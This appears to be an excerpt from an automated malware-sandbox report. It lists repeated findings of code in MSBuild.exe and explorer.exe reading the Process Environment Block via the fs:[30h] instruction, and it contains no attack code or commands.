Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015E3D43 mov eax, dword ptr fs:[00000030h]		4_2_015E3D43
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_01623540 mov eax, dword ptr fs:[00000030h]		4_2_01623540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_01653D40 mov eax, dword ptr fs:[00000030h]		4_2_01653D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015CC577 mov eax, dword ptr fs:[00000030h]		4_2_015CC577
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015CC577 mov eax, dword ptr fs:[00000030h]		4_2_015CC577
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_01678D34 mov eax, dword ptr fs:[00000030h]		4_2_01678D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0162A537 mov eax, dword ptr fs:[00000030h]		4_2_0162A537
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0166E539 mov eax, dword ptr fs:[00000030h]		4_2_0166E539
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015D4D3B mov eax, dword ptr fs:[00000030h]		4_2_015D4D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015D4D3B mov eax, dword ptr fs:[00000030h]		4_2_015D4D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015D4D3B mov eax, dword ptr fs:[00000030h]		4_2_015D4D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015AAD30 mov eax, dword ptr fs:[00000030h]		4_2_015AAD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015B3D34 mov eax, dword ptr fs:[00000030h]		4_2_015B3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015B3D34 mov eax, dword ptr fs:[00000030h]		4_2_015B3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015B3D34 mov eax, dword ptr fs:[00000030h]		4_2_015B3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015B3D34 mov eax, dword ptr fs:[00000030h]		4_2_015B3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015B3D34 mov eax, dword ptr fs:[00000030h]		4_2_015B3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015B3D34 mov eax, dword ptr fs:[00000030h]		4_2_015B3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015B3D34 mov eax, dword ptr fs:[00000030h]		4_2_015B3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015B3D34 mov eax, dword ptr fs:[00000030h]		4_2_015B3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015B3D34 mov eax, dword ptr fs:[00000030h]		4_2_015B3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015B3D34 mov eax, dword ptr fs:[00000030h]		4_2_015B3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015B3D34 mov eax, dword ptr fs:[00000030h]		4_2_015B3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015B3D34 mov eax, dword ptr fs:[00000030h]		4_2_015B3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015B3D34 mov eax, dword ptr fs:[00000030h]		4_2_015B3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0166FDE2 mov eax, dword ptr fs:[00000030h]		4_2_0166FDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0166FDE2 mov eax, dword ptr fs:[00000030h]		4_2_0166FDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0166FDE2 mov eax, dword ptr fs:[00000030h]		4_2_0166FDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0166FDE2 mov eax, dword ptr fs:[00000030h]		4_2_0166FDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_01658DF1 mov eax, dword ptr fs:[00000030h]		4_2_01658DF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_01626DC9 mov eax, dword ptr fs:[00000030h]		4_2_01626DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_01626DC9 mov eax, dword ptr fs:[00000030h]		4_2_01626DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_01626DC9 mov eax, dword ptr fs:[00000030h]		4_2_01626DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_01626DC9 mov ecx, dword ptr fs:[00000030h]		4_2_01626DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_01626DC9 mov eax, dword ptr fs:[00000030h]		4_2_01626DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_01626DC9 mov eax, dword ptr fs:[00000030h]		4_2_01626DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015BD5E0 mov eax, dword ptr fs:[00000030h]		4_2_015BD5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015BD5E0 mov eax, dword ptr fs:[00000030h]		4_2_015BD5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015DFD9B mov eax, dword ptr fs:[00000030h]		4_2_015DFD9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015DFD9B mov eax, dword ptr fs:[00000030h]		4_2_015DFD9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_016705AC mov eax, dword ptr fs:[00000030h]		4_2_016705AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_016705AC mov eax, dword ptr fs:[00000030h]		4_2_016705AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015A2D8A mov eax, dword ptr fs:[00000030h]		4_2_015A2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015A2D8A mov eax, dword ptr fs:[00000030h]		4_2_015A2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015A2D8A mov eax, dword ptr fs:[00000030h]		4_2_015A2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015A2D8A mov eax, dword ptr fs:[00000030h]		4_2_015A2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015A2D8A mov eax, dword ptr fs:[00000030h]		4_2_015A2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015D2581 mov eax, dword ptr fs:[00000030h]		4_2_015D2581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015D2581 mov eax, dword ptr fs:[00000030h]		4_2_015D2581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015D2581 mov eax, dword ptr fs:[00000030h]		4_2_015D2581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015D2581 mov eax, dword ptr fs:[00000030h]		4_2_015D2581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015D1DB5 mov eax, dword ptr fs:[00000030h]		4_2_015D1DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015D1DB5 mov eax, dword ptr fs:[00000030h]		4_2_015D1DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015D1DB5 mov eax, dword ptr fs:[00000030h]		4_2_015D1DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015D35A1 mov eax, dword ptr fs:[00000030h]		4_2_015D35A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015DA44B mov eax, dword ptr fs:[00000030h]		4_2_015DA44B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015C746D mov eax, dword ptr fs:[00000030h]		4_2_015C746D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0163C450 mov eax, dword ptr fs:[00000030h]		4_2_0163C450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0163C450 mov eax, dword ptr fs:[00000030h]		4_2_0163C450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_01661C06 mov eax, dword ptr fs:[00000030h]		4_2_01661C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_01661C06 mov eax, dword ptr fs:[00000030h]		4_2_01661C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_01661C06 mov eax, dword ptr fs:[00000030h]		4_2_01661C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_01661C06 mov eax, dword ptr fs:[00000030h]		4_2_01661C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_01661C06 mov eax, dword ptr fs:[00000030h]		4_2_01661C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_01661C06 mov eax, dword ptr fs:[00000030h]		4_2_01661C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_01661C06 mov eax, dword ptr fs:[00000030h]		4_2_01661C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_01661C06 mov eax, dword ptr fs:[00000030h]		4_2_01661C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_01661C06 mov eax, dword ptr fs:[00000030h]		4_2_01661C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_01661C06 mov eax, dword ptr fs:[00000030h]		4_2_01661C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_01661C06 mov eax, dword ptr fs:[00000030h]		4_2_01661C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_01661C06 mov eax, dword ptr fs:[00000030h]		4_2_01661C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_01661C06 mov eax, dword ptr fs:[00000030h]		4_2_01661C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_01661C06 mov eax, dword ptr fs:[00000030h]		4_2_01661C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_01626C0A mov eax, dword ptr fs:[00000030h]		4_2_01626C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_01626C0A mov eax, dword ptr fs:[00000030h]		4_2_01626C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_01626C0A mov eax, dword ptr fs:[00000030h]		4_2_01626C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_01626C0A mov eax, dword ptr fs:[00000030h]		4_2_01626C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0167740D mov eax, dword ptr fs:[00000030h]		4_2_0167740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0167740D mov eax, dword ptr fs:[00000030h]		4_2_0167740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0167740D mov eax, dword ptr fs:[00000030h]		4_2_0167740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015DBC2C mov eax, dword ptr fs:[00000030h]		4_2_015DBC2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_01626CF0 mov eax, dword ptr fs:[00000030h]		4_2_01626CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_01626CF0 mov eax, dword ptr fs:[00000030h]		4_2_01626CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_01626CF0 mov eax, dword ptr fs:[00000030h]		4_2_01626CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_016614FB mov eax, dword ptr fs:[00000030h]		4_2_016614FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_01678CD6 mov eax, dword ptr fs:[00000030h]		4_2_01678CD6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015B849B mov eax, dword ptr fs:[00000030h]		4_2_015B849B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_01678F6A mov eax, dword ptr fs:[00000030h]		4_2_01678F6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015BEF40 mov eax, dword ptr fs:[00000030h]		4_2_015BEF40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015BFF60 mov eax, dword ptr fs:[00000030h]		4_2_015BFF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015CF716 mov eax, dword ptr fs:[00000030h]		4_2_015CF716
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015DA70E mov eax, dword ptr fs:[00000030h]		4_2_015DA70E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015DA70E mov eax, dword ptr fs:[00000030h]		4_2_015DA70E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0167070D mov eax, dword ptr fs:[00000030h]		4_2_0167070D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0167070D mov eax, dword ptr fs:[00000030h]		4_2_0167070D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015DE730 mov eax, dword ptr fs:[00000030h]		4_2_015DE730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0163FF10 mov eax, dword ptr fs:[00000030h]		4_2_0163FF10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0163FF10 mov eax, dword ptr fs:[00000030h]		4_2_0163FF10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015A4F2E mov eax, dword ptr fs:[00000030h]		4_2_015A4F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015A4F2E mov eax, dword ptr fs:[00000030h]		4_2_015A4F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015E37F5 mov eax, dword ptr fs:[00000030h]		4_2_015E37F5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015B8794 mov eax, dword ptr fs:[00000030h]		4_2_015B8794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_01627794 mov eax, dword ptr fs:[00000030h]		4_2_01627794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_01627794 mov eax, dword ptr fs:[00000030h]		4_2_01627794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_01627794 mov eax, dword ptr fs:[00000030h]		4_2_01627794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015B7E41 mov eax, dword ptr fs:[00000030h]		4_2_015B7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015B7E41 mov eax, dword ptr fs:[00000030h]		4_2_015B7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015B7E41 mov eax, dword ptr fs:[00000030h]		4_2_015B7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015B7E41 mov eax, dword ptr fs:[00000030h]		4_2_015B7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015B7E41 mov eax, dword ptr fs:[00000030h]		4_2_015B7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015B7E41 mov eax, dword ptr fs:[00000030h]		4_2_015B7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0166AE44 mov eax, dword ptr fs:[00000030h]		4_2_0166AE44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0166AE44 mov eax, dword ptr fs:[00000030h]		4_2_0166AE44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015CAE73 mov eax, dword ptr fs:[00000030h]		4_2_015CAE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015CAE73 mov eax, dword ptr fs:[00000030h]		4_2_015CAE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015CAE73 mov eax, dword ptr fs:[00000030h]		4_2_015CAE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015CAE73 mov eax, dword ptr fs:[00000030h]		4_2_015CAE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015CAE73 mov eax, dword ptr fs:[00000030h]		4_2_015CAE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015B766D mov eax, dword ptr fs:[00000030h]		4_2_015B766D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015DA61C mov eax, dword ptr fs:[00000030h]		4_2_015DA61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015DA61C mov eax, dword ptr fs:[00000030h]		4_2_015DA61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0165FE3F mov eax, dword ptr fs:[00000030h]		4_2_0165FE3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015AC600 mov eax, dword ptr fs:[00000030h]		4_2_015AC600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015AC600 mov eax, dword ptr fs:[00000030h]		4_2_015AC600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015AC600 mov eax, dword ptr fs:[00000030h]		4_2_015AC600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015D8E00 mov eax, dword ptr fs:[00000030h]		4_2_015D8E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_01661608 mov eax, dword ptr fs:[00000030h]		4_2_01661608
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015AE620 mov eax, dword ptr fs:[00000030h]		4_2_015AE620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015D36CC mov eax, dword ptr fs:[00000030h]		4_2_015D36CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015E8EC7 mov eax, dword ptr fs:[00000030h]		4_2_015E8EC7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0165FEC0 mov eax, dword ptr fs:[00000030h]		4_2_0165FEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_01678ED6 mov eax, dword ptr fs:[00000030h]		4_2_01678ED6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015B76E2 mov eax, dword ptr fs:[00000030h]		4_2_015B76E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015D16E0 mov ecx, dword ptr fs:[00000030h]		4_2_015D16E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_01670EA5 mov eax, dword ptr fs:[00000030h]		4_2_01670EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_01670EA5 mov eax, dword ptr fs:[00000030h]		4_2_01670EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_01670EA5 mov eax, dword ptr fs:[00000030h]		4_2_01670EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_016246A7 mov eax, dword ptr fs:[00000030h]		4_2_016246A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0163FE87 mov eax, dword ptr fs:[00000030h]		4_2_0163FE87
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B0849B mov eax, dword ptr fs:[00000030h]		9_2_04B0849B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BB4496 mov eax, dword ptr fs:[00000030h]		9_2_04BB4496
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BB4496 mov eax, dword ptr fs:[00000030h]		9_2_04BB4496
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BB4496 mov eax, dword ptr fs:[00000030h]		9_2_04BB4496
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BB4496 mov eax, dword ptr fs:[00000030h]		9_2_04BB4496
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BB4496 mov eax, dword ptr fs:[00000030h]		9_2_04BB4496
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BB4496 mov eax, dword ptr fs:[00000030h]		9_2_04BB4496
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BB4496 mov eax, dword ptr fs:[00000030h]		9_2_04BB4496
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BB4496 mov eax, dword ptr fs:[00000030h]		9_2_04BB4496
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BB4496 mov eax, dword ptr fs:[00000030h]		9_2_04BB4496
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BB4496 mov eax, dword ptr fs:[00000030h]		9_2_04BB4496
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BB4496 mov eax, dword ptr fs:[00000030h]		9_2_04BB4496
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BB4496 mov eax, dword ptr fs:[00000030h]		9_2_04BB4496
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BB4496 mov eax, dword ptr fs:[00000030h]		9_2_04BB4496
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BB14FB mov eax, dword ptr fs:[00000030h]		9_2_04BB14FB
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B76CF0 mov eax, dword ptr fs:[00000030h]		9_2_04B76CF0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B76CF0 mov eax, dword ptr fs:[00000030h]		9_2_04B76CF0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B76CF0 mov eax, dword ptr fs:[00000030h]		9_2_04B76CF0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BC8CD6 mov eax, dword ptr fs:[00000030h]		9_2_04BC8CD6
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B2BC2C mov eax, dword ptr fs:[00000030h]		9_2_04B2BC2C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BC740D mov eax, dword ptr fs:[00000030h]		9_2_04BC740D
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BC740D mov eax, dword ptr fs:[00000030h]		9_2_04BC740D
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BC740D mov eax, dword ptr fs:[00000030h]		9_2_04BC740D
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BB1C06 mov eax, dword ptr fs:[00000030h]		9_2_04BB1C06
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BB1C06 mov eax, dword ptr fs:[00000030h]		9_2_04BB1C06
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BB1C06 mov eax, dword ptr fs:[00000030h]		9_2_04BB1C06
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BB1C06 mov eax, dword ptr fs:[00000030h]		9_2_04BB1C06
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BB1C06 mov eax, dword ptr fs:[00000030h]		9_2_04BB1C06
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BB1C06 mov eax, dword ptr fs:[00000030h]		9_2_04BB1C06
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BB1C06 mov eax, dword ptr fs:[00000030h]		9_2_04BB1C06
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BB1C06 mov eax, dword ptr fs:[00000030h]		9_2_04BB1C06
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BB1C06 mov eax, dword ptr fs:[00000030h]		9_2_04BB1C06
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BB1C06 mov eax, dword ptr fs:[00000030h]		9_2_04BB1C06
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BB1C06 mov eax, dword ptr fs:[00000030h]		9_2_04BB1C06
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BB1C06 mov eax, dword ptr fs:[00000030h]		9_2_04BB1C06
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BB1C06 mov eax, dword ptr fs:[00000030h]		9_2_04BB1C06
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BB1C06 mov eax, dword ptr fs:[00000030h]		9_2_04BB1C06
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B76C0A mov eax, dword ptr fs:[00000030h]		9_2_04B76C0A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B76C0A mov eax, dword ptr fs:[00000030h]		9_2_04B76C0A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B76C0A mov eax, dword ptr fs:[00000030h]		9_2_04B76C0A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B76C0A mov eax, dword ptr fs:[00000030h]		9_2_04B76C0A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B2AC7B mov eax, dword ptr fs:[00000030h]		9_2_04B2AC7B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B2AC7B mov eax, dword ptr fs:[00000030h]		9_2_04B2AC7B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B2AC7B mov eax, dword ptr fs:[00000030h]		9_2_04B2AC7B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B2AC7B mov eax, dword ptr fs:[00000030h]		9_2_04B2AC7B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B2AC7B mov eax, dword ptr fs:[00000030h]		9_2_04B2AC7B
